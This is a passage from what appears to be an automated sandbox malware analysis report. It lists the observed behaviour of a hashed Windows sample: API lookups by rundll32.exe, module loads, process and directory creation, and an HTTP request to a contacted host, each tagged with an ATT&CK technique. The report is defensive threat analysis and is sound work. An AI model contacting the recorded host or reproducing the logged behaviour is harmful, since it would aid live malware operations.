called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RpcBindingFree (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EventWrite (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CLSIDFromOle1Class (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCatalogObject2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DllCanUnloadNow (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6QueryLeaseInfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceNameToLuidW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter Dhcpv6FreeLeaseInfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpIsEnabled (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpQueryLeaseInfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpFreeLeaseInfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NSPStartup (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryConfigAllocEx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsNameCompare_W (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiAlloc (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsQueryExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadCompartmentId (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialAddr (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSAttemptAutodialName (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSNoteSuccessfulHostentLookup (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsApiFree (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NdrOleInitializeExtension (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetClassObject (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetMarshalSizeMax (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoMarshalInterface (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUnmarshalInterface (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoGetPSClsid (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoReleaseMarshalData (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DcomChannelSetHResult (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountNameLocalW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DhcpRequestParams (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPAcquireContext (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPReleaseContext (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDeriveKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetKeyParam (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetKeyParam (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPExportKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPImportKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPEncrypt (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDecrypt (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPCreateHash (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashData (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPHashSessionKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDestroyHash (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSignHash (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPVerifySignature (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGenRandom (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetUserKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetProvParam (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetProvParam (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPSetHashParam (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPGetHashParam (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateKey (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CPDuplicateHash (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateSecurityManager (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoInternetCreateZoneManager (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitFwImports (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcInitImports (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcVerifierCorruptionExpected (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter I_RpcExtInitializeExtensionPoint (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DnsFree (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter NamespaceCallout (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter QueryActCtxW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleExW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CreateActCtxW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ActivateActCtx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FindActCtxSectionStringW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter DeactivateActCtx (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyW (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter CoSetProxyBlanket (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASocketA (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter ObjectStublessClient10 (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSASend (UID: 00000000-00005856)\n \"rundll32.exe\" called \"GetProcAddress\" with a parameter WSARecv (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"17760890046,5820,3136,,FindResourceA,kernel32.dll,\"252:07:44.946\",RX=0,PX=0\" (Indicator: \"FindResource\"; Source: \"00000000-00005856.00000001.66223.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e1c6b@ADVAPI32.dll\"\n \"0e000f00703f1c6b@ADVAPI32.dll\"\n \"0e000f00cc3f1c6b@ADVAPI32.dll\"\n \"11001200b4471c6b@ADVAPI32.dll\"\n \"1100120048481c6b@ADVAPI32.dll\"\n \"120013008c481c6b@ADVAPI32.dll\"\n \"12001300e4481c6b@ADVAPI32.dll\"\n \"14001500386e1c6b@ADVAPI32.dll\"\n \"14001500506e1c6b@ADVAPI32.dll\"\n \"14001500686e1c6b@ADVAPI32.dll\"\n \"17001800806e1c6b@ADVAPI32.dll\"\n \"0d000e00986e1c6b@ADVAPI32.dll\"\n \"11001200a86e1c6b@ADVAPI32.dll\"\n \"11001200bc6e1c6b@ADVAPI32.dll\"\n \"0d000e0044661c6b@WININET.dll\"\n \"0d000e00b4661c6b@WININET.dll\"\n \"10001100ec661c6b@WININET.dll\"\n \"1000110090671c6b@WININET.dll\"\n \"10001100006f1c6b@WININET.dll\"\n \"10001100146f1c6b@WININET.dll\"\n \"14001500286f1c6b@WININET.dll\"\n \"14001500406f1c6b@WININET.dll\"\n \"12001300586f1c6b@WININET.dll\"\n \"120013006c6f1c6b@WININET.dll\"\n \"10001100d0671c6b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"CreateDirectoryA\" with parameter %WINDIR%\\system\\ (UID: 00000000-00005736)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005856)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00005856)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00005856)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005856)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00005856)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00005856)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rundll32.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"notepad_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system\\rundll32.exe\" - (UID: 00000000-00005736)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"rundll32.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"notepad_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-108", "type": 1, "relevance": 3, "name": "Contains ability to dynamically load libraries", "description": "LoadLibraryA@KERNEL32.dll at 61726-99-004047D0\n LoadLibraryA@KERNEL32.dll at 61726-97-00404B90\n LoadLibraryA@KERNEL32.dll at 61726-108-00405290", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-2", "type": 9, "name": "An application crash occurred", "description": "Report process \"WerFault.exe\" was created by \"svchost.exe\"", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /article.php?id=103822 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: www.zigui.org\nConnection: Keep-Alive\" Response ==> HTTP/1.1 400 Bad Request\nContent-Type: text/html\nDate: Thu\n 06 Feb 2025 09:08:47 GMT\nConnection: close\nContent-Length: 39 with response body ==>3C68313E42616420526571756573742028496E76616C696420486F73746E616D65293C2F68313E.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" has an executable section named \"\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" has an executable section named \".PEC\"\n \"_.exe\" has an executable section named \"\"\n \"_.exe\" has an executable section named \".PEC\"\n \"rundll32.exe\" has an executable section named \"\"\n \"rundll32.exe\" has an executable section named \".PEC\"\n \"notepad_.exe\" has an executable section named \"\"\n \"notepad_.exe\" has an executable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" has an writable section named \"\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" has an writable section named \".rsrc\"\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c\" has an writable section named \".PEC\"\n \"_.exe\" has an writable section named \"\"\n \"_.exe\" has an writable section named \".rsrc\"\n \"_.exe\" has an writable section named \".PEC\"\n \"rundll32.exe\" has an writable section named \"\"\n \"rundll32.exe\" has an writable section named \".rsrc\"\n \"rundll32.exe\" has an writable section named \".PEC\"\n \"notepad_.exe\" has an writable section named \"\"\n \"notepad_.exe\" has an writable section named \".rsrc\"\n \"notepad_.exe\" has an writable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"KERNEL32.DLL\" at base 75d00000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75860000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"ADVAPI32.DLL\" at base 76fb0000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74660000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"DWMAPI.DLL\" at base 74470000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 76ba0000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"CRYPTBASE.DLL\" at base 758b0000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"CLBCATQ.DLL\" at base 76f20000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 777f0000\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" loaded module \"OLEAUT32.DLL\" at base 77a10000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rundll32.exe\" loaded module \"KERNEL32\" at base 75d00000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rundll32.exe\" loaded module \"KERNEL32.DLL\" at base 75d00000\n \"rundll32.exe\" loaded module \"SECUR32.DLL\" at base 756e0000\n \"rundll32.exe\" loaded module \"RPCRT4.DLL\" at base 775b0000\n \"rundll32.exe\" loaded module \"SHELL32.DLL\" at base 75de0000\n \"rundll32.exe\" loaded module \"OLE32.DLL\" at base 76ba0000\n \"rundll32.exe\" loaded module \"ADVAPI32.DLL\" at base 76fb0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76a30000\n \"rundll32.exe\" loaded module \"PROFAPI.DLL\" at base 759d0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75a70000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71cf0000\n \"rundll32.exe\" loaded module \"URLMON.DLL\" at base 778c0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74660000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 6d900000\n \"rundll32.exe\" loaded module \"WS2_32.DLL\" at base 76ab0000\n \"rundll32.exe\" loaded module \"WINHTTP.DLL\" at base 71710000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75380000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 75370000\n \"rundll32.exe\" loaded module \"IPHLPAPI.DLL\" at base 73d20000\n \"rundll32.exe\" loaded module \"OLEAUT32.DLL\" at base 77a10000\n \"rundll32.exe\" loaded module \"DNSAPI.DLL\" at base 75240000\n \"rundll32.exe\" loaded module \"CRYPTBASE.DLL\" at base 758b0000\n \"rundll32.exe\" loaded module \"CLBCATQ.DLL\" at base 76f20000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6db70000\n \"rundll32.exe\" loaded module \"DHCPCSVC6.DLL\" at base 73c30000\n \"rundll32.exe\" loaded module \"DHCPCSVC.DLL\" at base 73ba0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ee0000\n \"rundll32.exe\" loaded module \"RASADHLP.DLL\" at base 72100000\n \"rundll32.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76a30000\n \"rundll32.exe\" loaded module \"CRYPTSP.DLL\" at base 753c0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 75150000\n \"rundll32.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75950000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73c50000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6cf90000\n \"rundll32.exe\" loaded module \"COMCTL32.DLL\" at base 74850000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 76ab0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 77a10000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 77300000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00005736)\n \"531d6bd6c0207ffc145c714da946bae8a057be3a3fc7001f5ea800ef8c61679c.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00005736)\n 